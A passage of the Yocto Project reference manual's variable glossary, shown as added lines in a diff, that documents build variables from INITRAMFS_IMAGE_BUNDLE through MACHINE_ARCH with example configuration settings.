+ You must set the ``INITRAMFS_IMAGE_BUNDLE`` variable in a
+ configuration file. You cannot set the variable in a recipe file.
+
+ See the
+ :yocto_git:`local.conf.sample.extended </cgit/cgit.cgi/poky/tree/meta-poky/conf/local.conf.sample.extended>`
+ file for additional information. Also, for information on creating an
+ initramfs, see the ":ref:`building-an-initramfs-image`" section
+ in the Yocto Project Development Tasks Manual.
+
+ :term:`INITRAMFS_LINK_NAME`
+ The link name of the initial RAM filesystem image. This variable is
+ set in the ``meta/classes/kernel-artifact-names.bbclass`` file as
+ follows:
+ ::
+
+ INITRAMFS_LINK_NAME ?= "initramfs-${KERNEL_ARTIFACT_LINK_NAME}"
+
+ The value of the
+ ``KERNEL_ARTIFACT_LINK_NAME`` variable, which is set in the same
+ file, has the following value:
+ ::
+
+ KERNEL_ARTIFACT_LINK_NAME ?= "${MACHINE}"
+
+ See the :term:`MACHINE` variable for additional
+ information.
+
+ :term:`INITRAMFS_NAME`
+ The base name of the initial RAM filesystem image. This variable is
+ set in the ``meta/classes/kernel-artifact-names.bbclass`` file as
+ follows:
+ ::
+
+ INITRAMFS_NAME ?= "initramfs-${KERNEL_ARTIFACT_NAME}"
+
+ The value of the :term:`KERNEL_ARTIFACT_NAME`
+ variable, which is set in the same file, has the following value:
+ ::
+
+ KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
+
+ :term:`INITRD`
+ Indicates list of filesystem images to concatenate and use as an
+ initial RAM disk (``initrd``).
+
+ The ``INITRD`` variable is an optional variable used with the
+ :ref:`image-live <ref-classes-image-live>` class.
+
+ :term:`INITRD_IMAGE`
+ When building a "live" bootable image (i.e. when
+ :term:`IMAGE_FSTYPES` contains "live"),
+ ``INITRD_IMAGE`` specifies the image recipe that should be built to
+ provide the initial RAM disk image. The default value is
+ "core-image-minimal-initramfs".
+
+ See the :ref:`image-live <ref-classes-image-live>` class for more
+ information.
+
+ :term:`INITSCRIPT_NAME`
+ The filename of the initialization script as installed to
+ ``${sysconfdir}/init.d``.
+
+ This variable is used in recipes when using ``update-rc.d.bbclass``.
+ The variable is mandatory.
+
+ :term:`INITSCRIPT_PACKAGES`
+ A list of the packages that contain initscripts. If multiple packages
+ are specified, you need to append the package name to the other
+ ``INITSCRIPT_*`` as an override.
+
+ This variable is used in recipes when using ``update-rc.d.bbclass``.
+ The variable is optional and defaults to the :term:`PN`
+ variable.
+
+ :term:`INITSCRIPT_PARAMS`
+ Specifies the options to pass to ``update-rc.d``. Here is an example:
+ ::
+
+ INITSCRIPT_PARAMS = "start 99 5 2 . stop 20 0 1 6 ."
+
+ In this example, the script has a runlevel of 99, starts the script
+ in initlevels 2 and 5, and stops the script in levels 0, 1 and 6.
+
+ The variable's default value is "defaults", which is set in the
+ :ref:`update-rc.d <ref-classes-update-rc.d>` class.
+
+ The value in ``INITSCRIPT_PARAMS`` is passed through to the
+ ``update-rc.d`` command. For more information on valid parameters,
+ please see the ``update-rc.d`` manual page at
+ https://manpages.debian.org/buster/init-system-helpers/update-rc.d.8.en.html
+
+ :term:`INSANE_SKIP`
+ Specifies the QA checks to skip for a specific package within a
+ recipe. For example, to skip the check for symbolic link ``.so``
+ files in the main package of a recipe, add the following to the
+ recipe. The package name override must be used, which in this example
+ is ``${PN}``:
+ ::
+
+ INSANE_SKIP_${PN} += "dev-so"
+
+ See the ":ref:`insane.bbclass <ref-classes-insane>`" section for a
+ list of the valid QA checks you can specify using this variable.
+
+ :term:`INSTALL_TIMEZONE_FILE`
+ By default, the ``tzdata`` recipe packages an ``/etc/timezone`` file.
+ Set the ``INSTALL_TIMEZONE_FILE`` variable to "0" at the
+ configuration level to disable this behavior.
+
+ :term:`IPK_FEED_URIS`
+ When the IPK backend is in use and package management is enabled on
+ the target, you can use this variable to set up ``opkg`` in the
+ target image to point to package feeds on a nominated server. Once
+ the feed is established, you can perform installations or upgrades
+ using the package manager at runtime.
+
+ :term:`KARCH`
+ Defines the kernel architecture used when assembling the
+ configuration. Architectures supported for this release are:
+
+ - powerpc
+ - i386
+ - x86_64
+ - arm
+ - qemu
+ - mips
+
+ You define the ``KARCH`` variable in the :ref:`kernel-dev/kernel-dev-advanced:bsp descriptions`.
+
+ :term:`KBRANCH`
+ A regular expression used by the build process to explicitly identify
+ the kernel branch that is validated, patched, and configured during a
+ build. You must set this variable to ensure the exact kernel branch
+ you want is being used by the build process.
+
+ Values for this variable are set in the kernel's recipe file and the
+ kernel's append file. For example, if you are using the
+ ``linux-yocto_4.12`` kernel, the kernel recipe file is the
+ ``meta/recipes-kernel/linux/linux-yocto_4.12.bb`` file. ``KBRANCH``
+ is set as follows in that kernel recipe file:
+ ::
+
+ KBRANCH ?= "standard/base"
+
+ This variable is also used from the kernel's append file to identify
+ the kernel branch specific to a particular machine or target
+ hardware. Continuing with the previous kernel example, the kernel's
+ append file (i.e. ``linux-yocto_4.12.bbappend``) is located in the
+ BSP layer for a given machine. For example, the append file for the
+ Beaglebone, EdgeRouter, and generic versions of both 32 and 64-bit IA
+ machines (``meta-yocto-bsp``) is named
+ ``meta-yocto-bsp/recipes-kernel/linux/linux-yocto_4.12.bbappend``.
+ Here are the related statements from that append file:
+ ::
+
+ KBRANCH_genericx86 = "standard/base"
+ KBRANCH_genericx86-64 = "standard/base"
+ KBRANCH_edgerouter = "standard/edgerouter"
+ KBRANCH_beaglebone = "standard/beaglebone"
+
+ The ``KBRANCH`` statements
+ identify the kernel branch to use when building for each supported
+ BSP.
+
+ :term:`KBUILD_DEFCONFIG`
+ When used with the :ref:`kernel-yocto <ref-classes-kernel-yocto>`
+ class, specifies an "in-tree" kernel configuration file for use
+ during a kernel build.
+
+ Typically, when using a ``defconfig`` to configure a kernel during a
+ build, you place the file in your layer in the same manner as you
+ would place patch files and configuration fragment files (i.e.
+ "out-of-tree"). However, if you want to use a ``defconfig`` file that
+ is part of the kernel tree (i.e. "in-tree"), you can use the
+ ``KBUILD_DEFCONFIG`` variable and append the
+ :term:`KMACHINE` variable to point to the
+ ``defconfig`` file.
+
+ To use the variable, set it in the append file for your kernel recipe
+ using the following form:
+ ::
+
+ KBUILD_DEFCONFIG_KMACHINE ?= defconfig_file
+
+ Here is an example from a "raspberrypi2" ``KMACHINE`` build that uses
+ a ``defconfig`` file named "bcm2709_defconfig":
+ ::
+
+ KBUILD_DEFCONFIG_raspberrypi2 = "bcm2709_defconfig"
+
+ As an alternative, you can use the following within your append file:
+ ::
+
+ KBUILD_DEFCONFIG_pn-linux-yocto ?= defconfig_file
+
+ For more
+ information on how to use the ``KBUILD_DEFCONFIG`` variable, see the
+ ":ref:`kernel-dev/kernel-dev-common:using an "in-tree" \`\`defconfig\`\` file`"
+ section in the Yocto Project Linux Kernel Development Manual.
+
+ :term:`KERNEL_ALT_IMAGETYPE`
+ Specifies an alternate kernel image type for creation in addition to
+ the kernel image type specified using the
+ :term:`KERNEL_IMAGETYPE` variable.
+
+ :term:`KERNEL_ARTIFACT_NAME`
+ Specifies the name of all of the build artifacts. You can change the
+ name of the artifacts by changing the ``KERNEL_ARTIFACT_NAME``
+ variable.
+
+ The value of ``KERNEL_ARTIFACT_NAME``, which is set in the
+ ``meta/classes/kernel-artifact-names.bbclass`` file, has the
+ following default value:
+ ::
+
+ KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
+
+ See the :term:`PKGE`, :term:`PKGV`, :term:`PKGR`, :term:`MACHINE`
+ and :term:`IMAGE_VERSION_SUFFIX` variables for additional information.
+
+ :term:`KERNEL_CLASSES`
+ A list of classes defining kernel image types that the
+ :ref:`kernel <ref-classes-kernel>` class should inherit. You
+ typically append this variable to enable extended image types. An
+ example is the "kernel-fitimage", which enables fitImage support and
+ resides in ``meta/classes/kernel-fitimage.bbclass``. You can register
+ custom kernel image types with the ``kernel`` class using this
+ variable.
+
+ :term:`KERNEL_DEVICETREE`
+ Specifies the name of the generated Linux kernel device tree (i.e.
+ the ``.dtb``) file.
+
+ .. note::
+
+ Legacy support exists for specifying the full path to the device
+ tree. However, providing just the ``.dtb`` file is preferred.
+
+ In order to use this variable, the
+ :ref:`kernel-devicetree <ref-classes-kernel-devicetree>` class must
+ be inherited.
+
+ :term:`KERNEL_DTB_LINK_NAME`
+ The link name of the kernel device tree binary (DTB). This variable
+ is set in the ``meta/classes/kernel-artifact-names.bbclass`` file as
+ follows:
+ ::
+
+ KERNEL_DTB_LINK_NAME ?= "${KERNEL_ARTIFACT_LINK_NAME}"
+
+ The
+ value of the ``KERNEL_ARTIFACT_LINK_NAME`` variable, which is set in
+ the same file, has the following value:
+ ::
+
+ KERNEL_ARTIFACT_LINK_NAME ?= "${MACHINE}"
+
+ See the :term:`MACHINE` variable for additional
+ information.
+
+ :term:`KERNEL_DTB_NAME`
+ The base name of the kernel device tree binary (DTB). This variable
+ is set in the ``meta/classes/kernel-artifact-names.bbclass`` file as
+ follows:
+ ::
+
+ KERNEL_DTB_NAME ?= "${KERNEL_ARTIFACT_NAME}"
+
+ The value of the :term:`KERNEL_ARTIFACT_NAME`
+ variable, which is set in the same file, has the following value:
+ ::
+
+ KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
+
+ :term:`KERNEL_DTC_FLAGS`
+ Specifies the ``dtc`` flags that are passed to the Linux kernel build
+ system when generating the device trees (via ``DTC_FLAGS`` environment
+ variable).
+
+ In order to use this variable, the
+ :ref:`kernel-devicetree <ref-classes-kernel-devicetree>` class must
+ be inherited.
+
+ :term:`KERNEL_EXTRA_ARGS`
+ Specifies additional ``make`` command-line arguments the OpenEmbedded
+ build system passes on when compiling the kernel.
+
+ :term:`KERNEL_FEATURES`
+ Includes additional kernel metadata. In the OpenEmbedded build
+ system, the default Board Support Packages (BSPs)
+ :term:`Metadata` is provided through the
+ :term:`KMACHINE` and :term:`KBRANCH`
+ variables. You can use the ``KERNEL_FEATURES`` variable from within
+ the kernel recipe or kernel append file to further add metadata for
+ all BSPs or specific BSPs.
+
+ The metadata you add through this variable includes config fragments
+ and features descriptions, which usually includes patches as well as
+ config fragments. You typically override the ``KERNEL_FEATURES``
+ variable for a specific machine. In this way, you can provide
+ validated, but optional, sets of kernel configurations and features.
+
+ For example, the following example from the ``linux-yocto-rt_4.12``
+ kernel recipe adds "netfilter" and "taskstats" features to all BSPs
+ as well as "virtio" configurations to all QEMU machines. The last two
+ statements add specific configurations to targeted machine types:
+ ::
+
+ KERNEL_EXTRA_FEATURES ?= "features/netfilter/netfilter.scc features/taskstats/taskstats.scc"
+ KERNEL_FEATURES_append = " ${KERNEL_EXTRA_FEATURES}"
+ KERNEL_FEATURES_append_qemuall = " cfg/virtio.scc"
+ KERNEL_FEATURES_append_qemux86 = " cfg/sound.scc cfg/paravirt_kvm.scc"
+ KERNEL_FEATURES_append_qemux86-64 = " cfg/sound.scc"
+
+ :term:`KERNEL_FIT_LINK_NAME`
+ The link name of the kernel flattened image tree (FIT) image. This
+ variable is set in the ``meta/classes/kernel-artifact-names.bbclass``
+ file as follows:
+ ::
+
+ KERNEL_FIT_LINK_NAME ?= "${KERNEL_ARTIFACT_LINK_NAME}"
+
+ The value of the
+ ``KERNEL_ARTIFACT_LINK_NAME`` variable, which is set in the same
+ file, has the following value:
+ ::
+
+ KERNEL_ARTIFACT_LINK_NAME ?= "${MACHINE}"
+
+ See the :term:`MACHINE` variable for additional
+ information.
+
+ :term:`KERNEL_FIT_NAME`
+ The base name of the kernel flattened image tree (FIT) image. This
+ variable is set in the ``meta/classes/kernel-artifact-names.bbclass``
+ file as follows:
+ ::
+
+ KERNEL_FIT_NAME ?= "${KERNEL_ARTIFACT_NAME}"
+
+ The value of the :term:`KERNEL_ARTIFACT_NAME`
+ variable, which is set in the same file, has the following value:
+ ::
+
+ KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
+
+ :term:`KERNEL_IMAGE_LINK_NAME`
+ The link name for the kernel image. This variable is set in the
+ ``meta/classes/kernel-artifact-names.bbclass`` file as follows:
+ ::
+
+ KERNEL_IMAGE_LINK_NAME ?= "${KERNEL_ARTIFACT_LINK_NAME}"
+
+ The value of
+ the ``KERNEL_ARTIFACT_LINK_NAME`` variable, which is set in the same
+ file, has the following value:
+ ::
+
+ KERNEL_ARTIFACT_LINK_NAME ?= "${MACHINE}"
+
+ See the :term:`MACHINE` variable for additional
+ information.
+
+ :term:`KERNEL_IMAGE_MAXSIZE`
+ Specifies the maximum size of the kernel image file in kilobytes. If
+ ``KERNEL_IMAGE_MAXSIZE`` is set, the size of the kernel image file is
+ checked against the set value during the
+ :ref:`ref-tasks-sizecheck` task. The task fails if
+ the kernel image file is larger than the setting.
+
+ ``KERNEL_IMAGE_MAXSIZE`` is useful for target devices that have a
+ limited amount of space in which the kernel image must be stored.
+
+ By default, this variable is not set, which means the size of the
+ kernel image is not checked.
+
+ :term:`KERNEL_IMAGE_NAME`
+ The base name of the kernel image. This variable is set in the
+ ``meta/classes/kernel-artifact-names.bbclass`` file as follows:
+ ::
+
+ KERNEL_IMAGE_NAME ?= "${KERNEL_ARTIFACT_NAME}"
+
+ The value of the
+ :term:`KERNEL_ARTIFACT_NAME` variable,
+ which is set in the same file, has the following value:
+ ::
+
+ KERNEL_ARTIFACT_NAME ?= "${PKGE}-${PKGV}-${PKGR}-${MACHINE}${IMAGE_VERSION_SUFFIX}"
+
+ :term:`KERNEL_IMAGETYPE`
+ The type of kernel to build for a device, usually set by the machine
+ configuration files and defaults to "zImage". This variable is used
+ when building the kernel and is passed to ``make`` as the target to
+ build.
+
+ If you want to build an alternate kernel image type, use the
+ :term:`KERNEL_ALT_IMAGETYPE` variable.
+
+ :term:`KERNEL_MODULE_AUTOLOAD`
+ Lists kernel modules that need to be auto-loaded during boot.
+
+ .. note::
+
+ This variable replaces the deprecated :term:`module_autoload`
+ variable.
+
+ You can use the ``KERNEL_MODULE_AUTOLOAD`` variable anywhere that it
+ can be recognized by the kernel recipe or by an out-of-tree kernel
+ module recipe (e.g. a machine configuration file, a distribution
+ configuration file, an append file for the recipe, or the recipe
+ itself).
+
+ Specify it as follows:
+ ::
+
+ KERNEL_MODULE_AUTOLOAD += "module_name1 module_name2 module_name3"
+
+ Including ``KERNEL_MODULE_AUTOLOAD`` causes the OpenEmbedded build
+ system to populate the ``/etc/modules-load.d/modname.conf`` file with
+ the list of modules to be auto-loaded on boot. The modules appear
+ one-per-line in the file. Here is an example of the most common use
+ case:
+ ::
+
+ KERNEL_MODULE_AUTOLOAD += "module_name"
+
+ For information on how to populate the ``modname.conf`` file with
+ ``modprobe.d`` syntax lines, see the :term:`KERNEL_MODULE_PROBECONF` variable.
+
+ :term:`KERNEL_MODULE_PROBECONF`
+ Provides a list of modules for which the OpenEmbedded build system
+ expects to find ``module_conf_``\ modname values that specify
+ configuration for each of the modules. For information on how to
+ provide those module configurations, see the
+ :term:`module_conf_* <module_conf>` variable.
+
+ :term:`KERNEL_PATH`
+ The location of the kernel sources. This variable is set to the value
+ of the :term:`STAGING_KERNEL_DIR` within
+ the :ref:`module <ref-classes-module>` class. For information on
+ how this variable is used, see the
+ ":ref:`kernel-dev/kernel-dev-common:incorporating out-of-tree modules`"
+ section in the Yocto Project Linux Kernel Development Manual.
+
+ To help maximize compatibility with out-of-tree drivers used to build
+ modules, the OpenEmbedded build system also recognizes and uses the
+ :term:`KERNEL_SRC` variable, which is identical to
+ the ``KERNEL_PATH`` variable. Both variables are common variables
+ used by external Makefiles to point to the kernel source directory.
+
+ :term:`KERNEL_SRC`
+ The location of the kernel sources. This variable is set to the value
+ of the :term:`STAGING_KERNEL_DIR` within
+ the :ref:`module <ref-classes-module>` class. For information on
+ how this variable is used, see the
+ ":ref:`kernel-dev/kernel-dev-common:incorporating out-of-tree modules`"
+ section in the Yocto Project Linux Kernel Development Manual.
+
+ To help maximize compatibility with out-of-tree drivers used to build
+ modules, the OpenEmbedded build system also recognizes and uses the
+ :term:`KERNEL_PATH` variable, which is identical
+ to the ``KERNEL_SRC`` variable. Both variables are common variables
+ used by external Makefiles to point to the kernel source directory.
+
+ :term:`KERNEL_VERSION`
+ Specifies the version of the kernel as extracted from ``version.h``
+ or ``utsrelease.h`` within the kernel sources. Effects of setting
+ this variable do not take affect until the kernel has been
+ configured. Consequently, attempting to refer to this variable in
+ contexts prior to configuration will not work.
+
+ :term:`KERNELDEPMODDEPEND`
+ Specifies whether the data referenced through
+ :term:`PKGDATA_DIR` is needed or not. The
+ ``KERNELDEPMODDEPEND`` does not control whether or not that data
+ exists, but simply whether or not it is used. If you do not need to
+ use the data, set the ``KERNELDEPMODDEPEND`` variable in your
+ ``initramfs`` recipe. Setting the variable there when the data is not
+ needed avoids a potential dependency loop.
+
+ :term:`KFEATURE_DESCRIPTION`
+ Provides a short description of a configuration fragment. You use
+ this variable in the ``.scc`` file that describes a configuration
+ fragment file. Here is the variable used in a file named ``smp.scc``
+ to describe SMP being enabled:
+ ::
+
+ define KFEATURE_DESCRIPTION "Enable SMP"
+
+ :term:`KMACHINE`
+ The machine as known by the kernel. Sometimes the machine name used
+ by the kernel does not match the machine name used by the
+ OpenEmbedded build system. For example, the machine name that the
+ OpenEmbedded build system understands as ``core2-32-intel-common``
+ goes by a different name in the Linux Yocto kernel. The kernel
+ understands that machine as ``intel-core2-32``. For cases like these,
+ the ``KMACHINE`` variable maps the kernel machine name to the
+ OpenEmbedded build system machine name.
+
+ These mappings between different names occur in the Yocto Linux
+ Kernel's ``meta`` branch. As an example take a look in the
+ ``common/recipes-kernel/linux/linux-yocto_3.19.bbappend`` file:
+ ::
+
+ LINUX_VERSION_core2-32-intel-common = "3.19.0"
+ COMPATIBLE_MACHINE_core2-32-intel-common = "${MACHINE}"
+ SRCREV_meta_core2-32-intel-common = "8897ef68b30e7426bc1d39895e71fb155d694974"
+ SRCREV_machine_core2-32-intel-common = "43b9eced9ba8a57add36af07736344dcc383f711"
+ KMACHINE_core2-32-intel-common = "intel-core2-32"
+ KBRANCH_core2-32-intel-common = "standard/base"
+ KERNEL_FEATURES_append_core2-32-intel-common = " ${KERNEL_FEATURES_INTEL_COMMON}"
+
+ The ``KMACHINE`` statement says
+ that the kernel understands the machine name as "intel-core2-32".
+ However, the OpenEmbedded build system understands the machine as
+ "core2-32-intel-common".
+
+ :term:`KTYPE`
+ Defines the kernel type to be used in assembling the configuration.
+ The linux-yocto recipes define "standard", "tiny", and "preempt-rt"
+ kernel types. See the ":ref:`kernel-dev/kernel-dev-advanced:kernel types`"
+ section in the
+ Yocto Project Linux Kernel Development Manual for more information on
+ kernel types.
+
+ You define the ``KTYPE`` variable in the
+ :ref:`kernel-dev/kernel-dev-advanced:bsp descriptions`. The
+ value you use must match the value used for the
+ :term:`LINUX_KERNEL_TYPE` value used by the
+ kernel recipe.
+
+ :term:`LABELS`
+ Provides a list of targets for automatic configuration.
+
+ See the :ref:`grub-efi <ref-classes-grub-efi>` class for more
+ information on how this variable is used.
+
+ :term:`LAYERDEPENDS`
+ Lists the layers, separated by spaces, on which this recipe depends.
+ Optionally, you can specify a specific layer version for a dependency
+ by adding it to the end of the layer name. Here is an example:
+ ::
+
+ LAYERDEPENDS_mylayer = "anotherlayer (=3)"
+
+ In this previous example,
+ version 3 of "anotherlayer" is compared against
+ :term:`LAYERVERSION`\ ``_anotherlayer``.
+
+ An error is produced if any dependency is missing or the version
+ numbers (if specified) do not match exactly. This variable is used in
+ the ``conf/layer.conf`` file and must be suffixed with the name of
+ the specific layer (e.g. ``LAYERDEPENDS_mylayer``).
+
+ :term:`LAYERDIR`
+ When used inside the ``layer.conf`` configuration file, this variable
+ provides the path of the current layer. This variable is not
+ available outside of ``layer.conf`` and references are expanded
+ immediately when parsing of the file completes.
+
+ :term:`LAYERRECOMMENDS`
+ Lists the layers, separated by spaces, recommended for use with this
+ layer.
+
+ Optionally, you can specify a specific layer version for a
+ recommendation by adding the version to the end of the layer name.
+ Here is an example:
+ ::
+
+ LAYERRECOMMENDS_mylayer = "anotherlayer (=3)"
+
+ In this previous example, version 3 of "anotherlayer" is compared
+ against ``LAYERVERSION_anotherlayer``.
+
+ This variable is used in the ``conf/layer.conf`` file and must be
+ suffixed with the name of the specific layer (e.g.
+ ``LAYERRECOMMENDS_mylayer``).
+
+ :term:`LAYERSERIES_COMPAT`
+ Lists the versions of the :term:`OpenEmbedded-Core (OE-Core)` for which
+ a layer is compatible. Using the ``LAYERSERIES_COMPAT`` variable
+ allows the layer maintainer to indicate which combinations of the
+ layer and OE-Core can be expected to work. The variable gives the
+ system a way to detect when a layer has not been tested with new
+ releases of OE-Core (e.g. the layer is not maintained).
+
+ To specify the OE-Core versions for which a layer is compatible, use
+ this variable in your layer's ``conf/layer.conf`` configuration file.
+ For the list, use the Yocto Project
+ :yocto_wiki:`Release Name </wiki/Releases>` (e.g.
+ DISTRO_NAME_NO_CAP). To specify multiple OE-Core versions for the
+ layer, use a space-separated list:
+ ::
+
+ LAYERSERIES_COMPAT_layer_root_name = "DISTRO_NAME_NO_CAP DISTRO_NAME_NO_CAP_MINUS_ONE"
+
+ .. note::
+
+ Setting ``LAYERSERIES_COMPAT`` is required by the Yocto Project
+ Compatible version 2 standard.
+ The OpenEmbedded build system produces a warning if the variable
+ is not set for any given layer.
+
+ See the ":ref:`dev-manual/dev-manual-common-tasks:creating your own layer`"
+ section in the Yocto Project Development Tasks Manual.
+
+ :term:`LAYERVERSION`
+ Optionally specifies the version of a layer as a single number. You
+ can use this within :term:`LAYERDEPENDS` for
+ another layer in order to depend on a specific version of the layer.
+ This variable is used in the ``conf/layer.conf`` file and must be
+ suffixed with the name of the specific layer (e.g.
+ ``LAYERVERSION_mylayer``).
+
+ :term:`LD`
+ The minimal command and arguments used to run the linker.
+
+ :term:`LDFLAGS`
+ Specifies the flags to pass to the linker. This variable is exported
+ to an environment variable and thus made visible to the software
+ being built during the compilation step.
+
+ Default initialization for ``LDFLAGS`` varies depending on what is
+ being built:
+
+ - :term:`TARGET_LDFLAGS` when building for the
+ target
+
+ - :term:`BUILD_LDFLAGS` when building for the
+ build host (i.e. ``-native``)
+
+ - :term:`BUILDSDK_LDFLAGS` when building for
+ an SDK (i.e. ``nativesdk-``)
+
+ :term:`LEAD_SONAME`
+ Specifies the lead (or primary) compiled library file (i.e. ``.so``)
+ that the :ref:`debian <ref-classes-debian>` class applies its
+ naming policy to given a recipe that packages multiple libraries.
+
+ This variable works in conjunction with the ``debian`` class.
+
+ :term:`LIC_FILES_CHKSUM`
+ Checksums of the license text in the recipe source code.
+
+ This variable tracks changes in license text of the source code
+ files. If the license text is changed, it will trigger a build
+ failure, which gives the developer an opportunity to review any
+ license change.
+
+ This variable must be defined for all recipes (unless
+ :term:`LICENSE` is set to "CLOSED").
+
+ For more information, see the ":ref:`usingpoky-configuring-lic_files_chksum`"
+ section in the Yocto Project Development Tasks Manual.
+
+ :term:`LICENSE`
+ The list of source licenses for the recipe. Follow these rules:
+
+ - Do not use spaces within individual license names.
+
+ - Separate license names using \| (pipe) when there is a choice
+ between licenses.
+
+ - Separate license names using & (ampersand) when multiple licenses
+ exist that cover different parts of the source.
+
+ - You can use spaces between license names.
+
+ - For standard licenses, use the names of the files in
+ ``meta/files/common-licenses/`` or the
+ :term:`SPDXLICENSEMAP` flag names defined in
+ ``meta/conf/licenses.conf``.
+
+ Here are some examples:
+ ::
+
+ LICENSE = "LGPLv2.1 | GPLv3"
+ LICENSE = "MPL-1 & LGPLv2.1"
+ LICENSE = "GPLv2+"
+
+ The first example is from the
+ recipes for Qt, which the user may choose to distribute under either
+ the LGPL version 2.1 or GPL version 3. The second example is from
+ Cairo where two licenses cover different parts of the source code.
+ The final example is from ``sysstat``, which presents a single
+ license.
+
+ You can also specify licenses on a per-package basis to handle
+ situations where components of the output have different licenses.
+ For example, a piece of software whose code is licensed under GPLv2
+ but has accompanying documentation licensed under the GNU Free
+ Documentation License 1.2 could be specified as follows:
+ ::
+
+ LICENSE = "GFDL-1.2 & GPLv2"
+ LICENSE_${PN} = "GPLv2"
+ LICENSE_${PN}-doc = "GFDL-1.2"
+
+ :term:`LICENSE_CREATE_PACKAGE`
+ Setting ``LICENSE_CREATE_PACKAGE`` to "1" causes the OpenEmbedded
+ build system to create an extra package (i.e.
+ ``${``\ :term:`PN`\ ``}-lic``) for each recipe and to add
+ those packages to the
+ :term:`RRECOMMENDS`\ ``_${PN}``.
+
+ The ``${PN}-lic`` package installs a directory in
+ ``/usr/share/licenses`` named ``${PN}``, which is the recipe's base
+ name, and installs files in that directory that contain license and
+ copyright information (i.e. copies of the appropriate license files
+ from ``meta/common-licenses`` that match the licenses specified in
+ the :term:`LICENSE` variable of the recipe metadata
+ and copies of files marked in
+ :term:`LIC_FILES_CHKSUM` as containing
+ license text).
+
+ For related information on providing license text, see the
+ :term:`COPY_LIC_DIRS` variable, the
+ :term:`COPY_LIC_MANIFEST` variable, and the
+ ":ref:`dev-manual/dev-manual-common-tasks:providing license text`"
+ section in the Yocto Project Development Tasks Manual.
+
+ :term:`LICENSE_FLAGS`
+ Specifies additional flags for a recipe you must whitelist through
+ :term:`LICENSE_FLAGS_WHITELIST` in
+ order to allow the recipe to be built. When providing multiple flags,
+ separate them with spaces.
+
+ This value is independent of :term:`LICENSE` and is
+ typically used to mark recipes that might require additional licenses
+ in order to be used in a commercial product. For more information,
+ see the
+ ":ref:`dev-manual/dev-manual-common-tasks:enabling commercially licensed recipes`"
+ section in the Yocto Project Development Tasks Manual.
+
+ :term:`LICENSE_FLAGS_WHITELIST`
+ Lists license flags that when specified in
+ :term:`LICENSE_FLAGS` within a recipe should not
+ prevent that recipe from being built. This practice is otherwise
+ known as "whitelisting" license flags. For more information, see the
+ ":ref:`dev-manual/dev-manual-common-tasks:enabling commercially licensed recipes`"
+ section in the Yocto Project Development Tasks Manual.
+
+ :term:`LICENSE_PATH`
+ Path to additional licenses used during the build. By default, the
+ OpenEmbedded build system uses ``COMMON_LICENSE_DIR`` to define the
+ directory that holds common license text used during the build. The
+ ``LICENSE_PATH`` variable allows you to extend that location to other
+ areas that have additional licenses:
+ ::
+
+ LICENSE_PATH += "path-to-additional-common-licenses"
+
+ :term:`LINUX_KERNEL_TYPE`
+ Defines the kernel type to be used in assembling the configuration.
+ The linux-yocto recipes define "standard", "tiny", and "preempt-rt"
+ kernel types. See the ":ref:`kernel-dev/kernel-dev-advanced:kernel types`"
+ section in the
+ Yocto Project Linux Kernel Development Manual for more information on
+ kernel types.
+
+ If you do not specify a ``LINUX_KERNEL_TYPE``, it defaults to
+ "standard". Together with :term:`KMACHINE`, the
+ ``LINUX_KERNEL_TYPE`` variable defines the search arguments used by
+ the kernel tools to find the appropriate description within the
+ kernel :term:`Metadata` with which to build out the sources
+ and configuration.
+
+ :term:`LINUX_VERSION`
+ The Linux version from ``kernel.org`` on which the Linux kernel image
+ being built using the OpenEmbedded build system is based. You define
+ this variable in the kernel recipe. For example, the
+ ``linux-yocto-3.4.bb`` kernel recipe found in
+ ``meta/recipes-kernel/linux`` defines the variables as follows:
+ ::
+
+ LINUX_VERSION ?= "3.4.24"
+
+ The ``LINUX_VERSION`` variable is used to define :term:`PV`
+ for the recipe:
+ ::
+
+ PV = "${LINUX_VERSION}+git${SRCPV}"
+
+ :term:`LINUX_VERSION_EXTENSION`
+ A string extension compiled into the version string of the Linux
+ kernel built with the OpenEmbedded build system. You define this
+ variable in the kernel recipe. For example, the linux-yocto kernel
+ recipes all define the variable as follows:
+ ::
+
+ LINUX_VERSION_EXTENSION ?= "-yocto-${LINUX_KERNEL_TYPE}"
+
+ Defining this variable essentially sets the Linux kernel
+ configuration item ``CONFIG_LOCALVERSION``, which is visible through
+ the ``uname`` command. Here is an example that shows the extension
+ assuming it was set as previously shown:
+ ::
+
+ $ uname -r
+ 3.7.0-rc8-custom
+
+ :term:`LOG_DIR`
+ Specifies the directory to which the OpenEmbedded build system writes
+ overall log files. The default directory is ``${TMPDIR}/log``.
+
+ For the directory containing logs specific to each task, see the
+ :term:`T` variable.
+
+ :term:`MACHINE`
+ Specifies the target device for which the image is built. You define
+ ``MACHINE`` in the ``local.conf`` file found in the
+ :term:`Build Directory`. By default, ``MACHINE`` is set to
+ "qemux86", which is an x86-based architecture machine to be emulated
+ using QEMU:
+ ::
+
+ MACHINE ?= "qemux86"
+
+ The variable corresponds to a machine configuration file of the same
+ name, through which machine-specific configurations are set. Thus,
+ when ``MACHINE`` is set to "qemux86" there exists the corresponding
+ ``qemux86.conf`` machine configuration file, which can be found in
+ the :term:`Source Directory` in
+ ``meta/conf/machine``.
+
+ The list of machines supported by the Yocto Project as shipped
+ include the following:
+ ::
+
+ MACHINE ?= "qemuarm"
+ MACHINE ?= "qemuarm64"
+ MACHINE ?= "qemumips"
+ MACHINE ?= "qemumips64"
+ MACHINE ?= "qemuppc"
+ MACHINE ?= "qemux86"
+ MACHINE ?= "qemux86-64"
+ MACHINE ?= "genericx86"
+ MACHINE ?= "genericx86-64"
+ MACHINE ?= "beaglebone"
+ MACHINE ?= "edgerouter"
+
+ The last five are Yocto Project reference hardware
+ boards, which are provided in the ``meta-yocto-bsp`` layer.
+
+ .. note::
+
+ Adding additional Board Support Package (BSP) layers to your
+ configuration adds new possible settings for ``MACHINE``.
+
+ :term:`MACHINE_ARCH`
+ Specifies the name of the machine-specific architecture. This
+ variable is set automatically from :term:`MACHINE` or
+ :term:`TUNE_PKGARCH`. You should not hand-edit
+ the ``MACHINE_ARCH`` variable.
+
